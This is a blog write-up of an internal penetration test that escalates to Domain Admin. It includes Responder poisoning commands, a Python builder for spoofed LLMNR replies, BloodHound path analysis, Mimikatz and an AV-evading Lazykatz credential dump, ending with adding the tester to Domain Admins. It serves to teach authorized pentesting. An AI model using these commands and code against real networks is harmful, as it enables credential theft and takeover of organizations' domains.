Compromising Domain Admin in Internal Pentest

The following blog post is nothing but a copy of an actual post by my friend on getting Domain Admin during an internal penetration test. It is very simple and easy to understand, so I thought of putting it on my website.

The first tool of choice is Responder in Analyze mode. This mode lets you see NBT-NS, BROWSER, LLMNR and DNS requests on the network without poisoning any responses; in simple words, it performs passive reconnaissance for you, so nothing is sent that a client could act on.
root@kali: python Responder.py -I eth1 -A
Responder for passive scanning

From the above screen we can see that hosts on the segment fall back to LLMNR and NBT-NS broadcasts for names DNS cannot resolve, so the network looks vulnerable to LLMNR and NBT-NS poisoning: anyone on the segment can answer those requests and claim to be the requested host. (Both protocols are enabled by default on Windows; the "Turn off multicast name resolution" Group Policy setting disables LLMNR and NBT-NS can be disabled per adapter, which removes this attack surface.) Firing up Responder with the respective poisoning flags, we captured the hashes of users on the network. Note that what Responder captures is a NetNTLM challenge/response, not the NT hash itself, so it has to be cracked offline (or relayed) rather than passed.
root@kali: python Responder.py -I eth1 -Pbv

Responder with respective flags
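To make concrete what the poisoning flags do, here is an added example (not from the original post and not Responder's own code) that builds an LLMNR A-record query as a Windows client multicasts it to 224.0.0.252:5355, parses it, and constructs the spoofed reply that points the name at an attacker IP. The transaction ID, the name fileserver01 and the IP 10.0.0.5 are constructed sample values. Responder's LLMNR answer has the same layout (QR flag set, question echoed, a single A record with a 30-second TTL); sending it on the wire is left out so the example runs offline.

```python
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)  # multicast address/port used by LLMNR (RFC 4795)


def _encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def _decode_name(pkt: bytes, off: int):
    """Decode labels starting at off; returns (name, offset after the name).
    Compression pointers are not handled (nothing here emits them)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n


def build_llmnr_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """What a client sends when DNS fails: header (QDCOUNT=1) plus question (name, type, class IN)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_llmnr_query(pkt: bytes) -> dict:
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not an LLMNR query")
    name, off = _decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_reply(query_pkt: bytes, attacker_ip: str, ttl: int = 30):
    """Spoofed answer: same transaction ID, QR bit set, question echoed, one A record -> attacker_ip.
    Only A (type 1) queries are answered; returns None for anything else."""
    q = parse_llmnr_query(query_pkt)
    if q["qtype"] != 1:
        return None
    qname = _encode_name(q["name"])
    header = struct.pack(">HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    question = qname + struct.pack(">HH", 1, 1)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = qname + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_llmnr_reply(pkt: bytes) -> dict:
    """Read the first answer of a reply, the way the victim's resolver would."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an LLMNR response")
    _qname, off = _decode_name(pkt, 12)
    off += 4  # skip QTYPE/QCLASS of the echoed question
    aname, off = _decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    ip = ".".join(str(b) for b in pkt[off:off + rdlen])
    return {"id": txid, "name": aname, "type": rtype, "ttl": ttl, "ip": ip}


if __name__ == "__main__":
    # Constructed sample: a victim asks for "fileserver01" (a mistyped or decommissioned host) and we answer.
    query = build_llmnr_query(0x1234, "fileserver01")
    reply = build_poisoned_reply(query, "10.0.0.5")
    print(parse_llmnr_reply(reply))
```

Once the victim believes fileserver01 is 10.0.0.5, its next SMB or HTTP connection authenticates to the attacker, which is where the NetNTLM challenge/response in the next screenshots comes from.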

Yay, we got some cleartext credentials of users through the WPAD flag (-w): combined with -b, Responder answers the proxy authentication with an HTTP Basic prompt instead of NTLM, so whatever the user types into the prompt arrives in the clear. Most of them, however, were normal internal users. Continuing to run Responder on the network, we captured the hash of the Servicedesk account.

continued running Responder

Then we cracked the hash using Hashcat with the aid of a dictionary file (Responder captures NetNTLMv2 challenge/responses by default, which is Hashcat mode 5600). Now it was time to abuse the cracked Servicedesk credentials to dig further into the infrastructure. Using the trick explained by @sixdb in the article, we used the /netonly flag of runas.exe. With /netonly, Windows does not validate the credentials at logon and only uses them for outbound network authentication, which allowed us to launch a cmd.exe that authenticates to the domain as the domain user Servicedesk from a non-domain-joined system.

using /netonly flag

Once connected, you can run various tools; we used PowerSploit (its PowerView module) to dump more information about the domain as an authenticated user. We enumerated the Domain Controllers and the members of the Domain Admins group in the infrastructure.

enumerated information about Domain Controllers and Domain Admins

enumerated information about Domain Admins

Now we need to find a path to a Domain Admin account. For this we used BloodHound, which reveals the hidden and often unintended relationships within an Active Directory environment (group memberships, local admin rights and logged-on sessions) and in turn expedites the escalation process.


BloodHound's ingestor generates three CSV files for visualization: group memberships, local admin rights and user sessions. These are imported into BloodHound's Neo4j database, which is where the graph queries run.

CSV files

Using the graph generated by BloodHound, we ran the built-in query “Shortest Path to Domain Admins”.

Visualization of "Shortest Path to Domain Admins"
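As an added example (not the post's code and not BloodHound's), the following reproduces what the “Shortest Path to Domain Admins” query does over the three ingestor CSVs: it loads group memberships, local admin rights and sessions into a directed graph with MemberOf, AdminTo and HasSession edges, then breadth-first searches from the compromised user to the Domain Admins group. The CSV contents, the domain corp.local, the hosts srv01/wks01 and the users bob and alice are constructed; the column headers follow the BloodHound 1.x ingestor format from memory and are an assumption.

```python
import csv
import io
from collections import deque

# Constructed sample data shaped like the three CSVs the BloodHound 1.x ingestor writes
# (group_memberships.csv, local_admins.csv, sessions.csv). Header names are assumed.
GROUP_MEMBERSHIPS = """AccountName,AccountType,GroupName
servicedesk@corp.local,user,HELPDESK@CORP.LOCAL
alice@corp.local,user,HELPDESK@CORP.LOCAL
bob@corp.local,user,DOMAIN ADMINS@CORP.LOCAL
"""
LOCAL_ADMINS = """ComputerName,AccountName,AccountType
srv01.corp.local,HELPDESK@CORP.LOCAL,group
wks01.corp.local,servicedesk@corp.local,user
"""
SESSIONS = """UserName,ComputerName,Weight
bob@corp.local,srv01.corp.local,1
alice@corp.local,wks01.corp.local,1
"""

DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"


def build_graph(group_csv: str, admin_csv: str, session_csv: str) -> dict:
    """Directed adjacency list: node -> [(edge_type, node)]. Names are upper-cased so the
    user, group and computer spellings in the three files match each other."""
    graph = {}

    def add(src, kind, dst):
        graph.setdefault(src.upper(), []).append((kind, dst.upper()))
        graph.setdefault(dst.upper(), [])

    for row in csv.DictReader(io.StringIO(group_csv)):
        add(row["AccountName"], "MemberOf", row["GroupName"])     # user/group -> group
    for row in csv.DictReader(io.StringIO(admin_csv)):
        add(row["AccountName"], "AdminTo", row["ComputerName"])   # user/group -> computer
    for row in csv.DictReader(io.StringIO(session_csv)):
        add(row["ComputerName"], "HasSession", row["UserName"])   # computer -> logged-on user
    return graph


def shortest_path(graph: dict, start: str, target: str):
    """Unweighted BFS, which is what 'Shortest Path to Domain Admins' computes over the Neo4j graph.
    Returns [(edge_type, node), ...] from start (exclusive) to target, or None if unreachable."""
    start, target = start.upper(), target.upper()
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while prev[node] is not None:
                parent, kind = prev[node]
                path.append((kind, node))
                node = parent
            return path[::-1]
        for kind, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, kind)
                queue.append(nxt)
    return None


def path_to_domain_admins(start_user: str):
    graph = build_graph(GROUP_MEMBERSHIPS, LOCAL_ADMINS, SESSIONS)
    return shortest_path(graph, start_user, DOMAIN_ADMINS)


def first_hop_server(path):
    """The machine to dump credentials from: the first computer reached through an AdminTo edge."""
    for kind, node in path or []:
        if kind == "AdminTo":
            return node
    return None


if __name__ == "__main__":
    path = path_to_domain_admins("servicedesk@corp.local")
    for kind, node in path:
        print(f"-[{kind}]-> {node}")
    print("hops:", len(path), "first hop:", first_hop_server(path))
```

The returned path lists the hops, and the first AdminTo edge is the server to target for credential dumping, exactly the "first hop server" the post goes after next; the HasSession edge that follows it is the Domain Admin logon that makes the dump worthwhile.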

The generated graph shows the number of hops required to reach a machine where a Domain Admin is logged in. The first hop is a server the Servicedesk account can administer, so from our cmd.exe access we can run Invoke-Mimikatz.ps1 against it to dump credentials. But nowadays all AV engines flag these scripts.

Virustotal scan result

So, to bypass AV detection, we used Lazykatz. It is an automation developed to extract credentials from remote targets protected with AV and/or application whitelisting software, built on top of @subtee's work.

Running Lazykatz with the Servicedesk account against the first-hop server, we got the cleartext credentials of one of the members of the Domain Admins group. Using those credentials we added our user to the Domain Admins group.

Finally, we are a member of the Domain Admins group. Happy hunting.

Posted in Hacking, Operating System, Security